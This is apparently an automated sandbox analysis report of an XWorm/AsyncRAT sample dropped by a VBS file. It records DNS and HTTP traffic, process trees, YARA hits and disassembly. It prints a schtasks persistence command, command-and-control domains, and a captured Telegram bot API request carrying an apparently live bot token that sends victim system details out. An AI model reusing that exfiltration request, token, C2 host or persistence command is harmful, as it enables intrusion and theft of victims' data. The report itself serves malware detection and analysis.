                                                    Oct 6, 2024 16:45:35.088737011 CEST5357273162.159.36.2192.168.2.7
                                                    Oct 6, 2024 16:45:35.589329958 CEST4916453192.168.2.71.1.1.1
                                                    Oct 6, 2024 16:45:35.596916914 CEST53491641.1.1.1192.168.2.7
                                                    Oct 6, 2024 16:45:37.329031944 CEST5454953192.168.2.71.1.1.1
                                                    Oct 6, 2024 16:45:37.336631060 CEST53545491.1.1.1192.168.2.7
                                                    Oct 6, 2024 16:46:00.020689011 CEST6120253192.168.2.71.1.1.1
                                                    Oct 6, 2024 16:46:00.029333115 CEST53612021.1.1.1192.168.2.7

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 6, 2024 16:45:08.390705109 CEST192.168.2.71.1.1.10x2bd1Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 16:45:10.863224983 CEST192.168.2.71.1.1.10x8eeStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 16:45:12.090074062 CEST192.168.2.71.1.1.10xa937Standard query (0)isika.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 16:45:35.589329958 CEST192.168.2.71.1.1.10x66aaStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                    Oct 6, 2024 16:45:37.329031944 CEST192.168.2.71.1.1.10x3a79Standard query (0)50.23.12.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                    Oct 6, 2024 16:46:00.020689011 CEST192.168.2.71.1.1.10xafa7Standard query (0)isika.ddns.netA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Oct 6, 2024 16:45:08.397561073 CEST1.1.1.1192.168.2.70x2bd1No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                    Oct 6, 2024 16:45:10.870364904 CEST1.1.1.1192.168.2.70x8eeNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                    Oct 6, 2024 16:45:12.099929094 CEST1.1.1.1192.168.2.70xa937No error (0)isika.ddns.net45.88.91.147A (IP address)IN (0x0001)false
                                                    Oct 6, 2024 16:45:35.596916914 CEST1.1.1.1192.168.2.70x66aaName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                    Oct 6, 2024 16:45:37.336631060 CEST1.1.1.1192.168.2.70x3a79Name error (3)50.23.12.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                    Oct 6, 2024 16:46:00.029333115 CEST1.1.1.1192.168.2.70xafa7No error (0)isika.ddns.net45.88.91.147A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • api.telegram.org
                                                    • ip-api.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.749699208.95.112.1801204C:\Users\user\AppData\Local\Temp\WindowsApp.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 6, 2024 16:45:08.409285069 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                    Host: ip-api.com
                                                    Connection: Keep-Alive
                                                    Oct 6, 2024 16:45:08.869294882 CEST175INHTTP/1.1 200 OK
                                                    Date: Sun, 06 Oct 2024 14:45:07 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Content-Length: 6
                                                    Access-Control-Allow-Origin: *
                                                    X-Ttl: 60
                                                    X-Rl: 44
                                                    Data Raw: 66 61 6c 73 65 0a
                                                    Data Ascii: false


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.749701149.154.167.2204431204C:\Users\user\AppData\Local\Temp\WindowsApp.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-06 14:45:11 UTC453OUTGET /bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=7062075018&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A662C920EC437F040F44A%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%201YPBEL4ES%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
                                                    Host: api.telegram.org
                                                    Connection: Keep-Alive
                                                    2024-10-06 14:45:11 UTC388INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0
                                                    Date: Sun, 06 Oct 2024 14:45:11 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 441
                                                    Connection: close
                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                    2024-10-06 14:45:11 UTC441INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 34 38 37 30 35 31 34 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 64 33 34 4f 6e 6c 69 6e 65 5c 75 64 38 33 64 5c 75 64 64 33 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 69 67 61 6c 6f 61 6e 65 72 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 30 36 32 30 37 35 30 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 49 53 49 4b 41 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 32 32 35 39 31 31 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 6f 72 6d 20 56 35 2e
                                                    Data Ascii: {"ok":true,"result":{"message_id":56,"from":{"id":7048705146,"is_bot":true,"first_name":"\ud83d\udd34Online\ud83d\udd34","username":"GigaloanerBot"},"chat":{"id":7062075018,"first_name":"ISIKA","type":"private"},"date":1728225911,"text":"\u2620 [XWorm V5.


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:2
                                                    Start time:10:45:02
                                                    Start date:06/10/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs"
                                                    Imagebase:0x7ff72c240000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:10:45:02
                                                    Start date:06/10/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\WindowsApp.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe"
                                                    Imagebase:0x200000
                                                    File size:220'160 bytes
                                                    MD5 hash:0C3A47BC813554D40583861DDCDE06B8
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:10
                                                    Start time:10:45:09
                                                    Start date:06/10/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe"
                                                    Imagebase:0x7ff68a8a0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:10:45:09
                                                    Start date:06/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:10:45:10
                                                    Start date:06/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\task.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Roaming\task.exe
                                                    Imagebase:0xbb0000
                                                    File size:220'160 bytes
                                                    MD5 hash:0C3A47BC813554D40583861DDCDE06B8
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:14
                                                    Start time:10:45:18
                                                    Start date:06/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\task.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\task.exe"
                                                    Imagebase:0xdf0000
                                                    File size:220'160 bytes
                                                    MD5 hash:0C3A47BC813554D40583861DDCDE06B8
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:15
                                                    Start time:12:20:07
                                                    Start date:06/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\task.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Roaming\task.exe
                                                    Imagebase:0x9c0000
                                                    File size:220'160 bytes
                                                    MD5 hash:0C3A47BC813554D40583861DDCDE06B8
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:16
                                                    Start time:12:20:11
                                                    Start date:06/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\task.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\task.exe"
                                                    Imagebase:0x40000
                                                    File size:220'160 bytes
                                                    MD5 hash:0C3A47BC813554D40583861DDCDE06B8
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:20
                                                    Start time:12:21:00
                                                    Start date:06/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\task.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Roaming\task.exe
                                                    Imagebase:0xef0000
                                                    File size:220'160 bytes
                                                    MD5 hash:0C3A47BC813554D40583861DDCDE06B8
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:23
                                                    Start time:12:21:24
                                                    Start date:06/10/2024
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 1204 -s 3304
                                                    Imagebase:0x7ff74efc0000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:11.8%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:66.7%
                                                      Total number of Nodes:9
                                                      Total number of Limit Nodes:0

                                                      Executed Functions

                                                      Function 00007FFAAC4E0235 Relevance: 1.8, APIs: 1, Instructions: 264COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 115 7ffaac4e0235-7ffaac4e08d8 CheckRemoteDebuggerPresent 143 7ffaac4e08e0-7ffaac4e094c 115->143 144 7ffaac4e08da 115->144 144->143
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00d1cec9610478e4fb2ea590b70396fdc6eedc4b5d7f177c2873fb32de991612
                                                      • Instruction ID: 1584b4baa1fdbcfca0d3c3a57dc73812e9fe734b994f32e30f6f08180359a95f
                                                      • Opcode Fuzzy Hash: 00d1cec9610478e4fb2ea590b70396fdc6eedc4b5d7f177c2873fb32de991612
                                                      • Instruction Fuzzy Hash: 78910471D0D689CFEB55CB68C4596E9BFF0FF62310F0481AAC458D7192DB349849CB94
                                                      Function 00007FFAAC4E3799 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 147 7ffaac4e3799-7ffaac4e37a5 148 7ffaac4e37a7-7ffaac4e37af 147->148 149 7ffaac4e37b0-7ffaac4e3859 147->149 148->149 153 7ffaac4e3868-7ffaac4e38ee SetWindowsHookExW 149->153 154 7ffaac4e385b-7ffaac4e3865 149->154 155 7ffaac4e38f6-7ffaac4e3963 153->155 156 7ffaac4e38f0 153->156 154->153 156->155
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID: HookWindows
                                                      • String ID:
                                                      • API String ID: 2559412058-0
                                                      • Opcode ID: ef7d63d1a56b9b5db95637acbb8d782c78745c259169801d7b159160787fc812
                                                      • Instruction ID: 6685c58072d924479f70242efe626833727f740128e19bb1fe229422b64c76d2
                                                      • Opcode Fuzzy Hash: ef7d63d1a56b9b5db95637acbb8d782c78745c259169801d7b159160787fc812
                                                      • Instruction Fuzzy Hash: 44516B70908A5D8FDB58DF68C845BE9BBF0FB1A314F1041AED00DE3292DB74A985CB45
                                                      Function 00007FFAAC4E07E8 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 168 7ffaac4e07e8-7ffaac4e08d8 CheckRemoteDebuggerPresent 172 7ffaac4e08e0-7ffaac4e094c 168->172 173 7ffaac4e08da 168->173 173->172
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID: CheckDebuggerPresentRemote
                                                      • String ID:
                                                      • API String ID: 3662101638-0
                                                      • Opcode ID: b80cb3be980c07e16c4a46f09c004f020fcaa134d892e0c165d121471c14a76d
                                                      • Instruction ID: 057abfa3f75cb695438f1bba97bd78d4c527cbae051213a394b6cd85e1e0fa68
                                                      • Opcode Fuzzy Hash: b80cb3be980c07e16c4a46f09c004f020fcaa134d892e0c165d121471c14a76d
                                                      • Instruction Fuzzy Hash: 33511470D0860C8FEB94DFA9C489BEDBBF1EB69311F10816AD409E3251DB749989CF80
                                                      Function 00007FFAAC4DDF5A Relevance: .7, Instructions: 704COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a179bff6946361d019966de93ef2d13e13f351293f36070812f94ccb0f0ce129
                                                      • Instruction ID: 772d423680a008e9f449da855abcb1ef4b3b783fd4eecdd343184e3422856667
                                                      • Opcode Fuzzy Hash: a179bff6946361d019966de93ef2d13e13f351293f36070812f94ccb0f0ce129
                                                      • Instruction Fuzzy Hash: 0A324D70919A8D8FEBB9EF28C859BE937E1FB59301F00412AD84EC76A1DF749584CB41
                                                      Function 00007FFAAC4DF3B2 Relevance: .7, Instructions: 678COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f3d144710631f5f7b1ced566195ab8b21bb4b93572f77a7fde2d16e230a4dc9
                                                      • Instruction ID: 17488904423ef0ea944b258103068bed6c4eeb76809b2d61d3daef75d458bee4
                                                      • Opcode Fuzzy Hash: 1f3d144710631f5f7b1ced566195ab8b21bb4b93572f77a7fde2d16e230a4dc9
                                                      • Instruction Fuzzy Hash: EE325D70919A8D8FEBB9EF28C859BE937E1FB59311F00412AD84EC7291DF749584CB81
                                                      Function 00007FFAAC4DEDF6 Relevance: .5, Instructions: 482COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9beba542cdd76b56cb79e53a2f5c2410a84e2bbd927412fa7b57df8c8f5965e8
                                                      • Instruction ID: 9d05370b0365ea9bdd7027fa9c0c7d326fae3d6978fae2bbbe5fd1e852a4a2ea
                                                      • Opcode Fuzzy Hash: 9beba542cdd76b56cb79e53a2f5c2410a84e2bbd927412fa7b57df8c8f5965e8
                                                      • Instruction Fuzzy Hash: 5AF15C70509A8D8FEBB9EF28C859BE937E1FF59301F00812AD84EC7291DB759945CB81
                                                      Function 00007FFAAC4E9D77 Relevance: .3, Instructions: 282COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3994b02932d4322ddf9fe8eaaf06ba545a1c0e9638b5ad1af4a61be359f17588
                                                      • Instruction ID: 44462b2cca64123ddbc2251661b129f93762e682d17a32cbb0f79baf3f8d3e1a
                                                      • Opcode Fuzzy Hash: 3994b02932d4322ddf9fe8eaaf06ba545a1c0e9638b5ad1af4a61be359f17588
                                                      • Instruction Fuzzy Hash: 3CA1677090874C8FDB95DF68C895BE9BBF1FB5A300F1081AAC44DE3292CA34A985CF41
                                                      Function 00007FFAAC4E7EDD Relevance: .3, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1a51ae17dce49fa6badc1e8831176d04f28303d26f3ace3714d248e31c797859
                                                      • Instruction ID: babfcaa052ef61a9f3018803641fba3e464570b48e46057009f5afe2ebffafd9
                                                      • Opcode Fuzzy Hash: 1a51ae17dce49fa6badc1e8831176d04f28303d26f3ace3714d248e31c797859
                                                      • Instruction Fuzzy Hash: 91810A70D0861C8FDB94DF68C895BE9BBB1FB5A304F1081AED44EE3251DA34A985CF45
                                                      Function 00007FFAAC4D18CB Relevance: .2, Instructions: 169COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4cb000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d840c2795e706f5865e1fb006b7ea9293de73ed2fcde8993ce805afe0ff8bf81
                                                      • Instruction ID: 436396113420f6bb54ab5c3fc8dc92c8a7142834c972e1db84cac2e16dd4c3d9
                                                      • Opcode Fuzzy Hash: d840c2795e706f5865e1fb006b7ea9293de73ed2fcde8993ce805afe0ff8bf81
                                                      • Instruction Fuzzy Hash: 4E417C3160D2894FE71E9A3888561B57B96EB83320B15C3BFD4CBC7197DD28980B83C5
                                                      Function 00007FFAAC4D1924 Relevance: .2, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4cb000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c887646512b7f0bad1f2314952e4bd2557ec4a905aff2de3c4d2e09263039a6
                                                      • Instruction ID: 27dba7944ea26737c26bf003c711cb817d3c22344dac67dca644ecf882541ec6
                                                      • Opcode Fuzzy Hash: 1c887646512b7f0bad1f2314952e4bd2557ec4a905aff2de3c4d2e09263039a6
                                                      • Instruction Fuzzy Hash: 9341383160D2894FE71E9A3888561B57BA6EB83320B15C2BFD48BC71E7DD24980B83D5
                                                      Function 00007FFAAC4CFE79 Relevance: .1, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4cb000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a6c61865140aeec3e8324e9d0cc5a740655c9da7432fa3c3e6568a41379730a4
                                                      • Instruction ID: 72ecb9a8d40d025c191d3fc07d079d831bbdc6ac9262437024e56c2c99ada03b
                                                      • Opcode Fuzzy Hash: a6c61865140aeec3e8324e9d0cc5a740655c9da7432fa3c3e6568a41379730a4
                                                      • Instruction Fuzzy Hash: F8213D7264D3890FE31C5D68ACDB477BB98E783214742927FE6C7C65A3DD18941742C1
                                                      Function 00007FFAAC4CBCF5 Relevance: 1.7, APIs: 1, Instructions: 182memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 161 7ffaac4cbcf5-7ffaac4cbe27 VirtualProtect 165 7ffaac4cbe29 161->165 166 7ffaac4cbe2f-7ffaac4cbe7d 161->166 165->166
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4cb000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 700adbc10616650fef20f1847ed3608f3afb28380fbcd873c40e8562c54b70a1
                                                      • Instruction ID: 547211de2b04c5d048accff35af4c518f4b5fd5b0485b2612e08cd28a94beff8
                                                      • Opcode Fuzzy Hash: 700adbc10616650fef20f1847ed3608f3afb28380fbcd873c40e8562c54b70a1
                                                      • Instruction Fuzzy Hash: E751397090871C8FDB58DF98D885AEDBBF1FB69315F10426ED04AE3251DB70A985CB81
                                                      Function 00007FFAAC4C6AD0 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
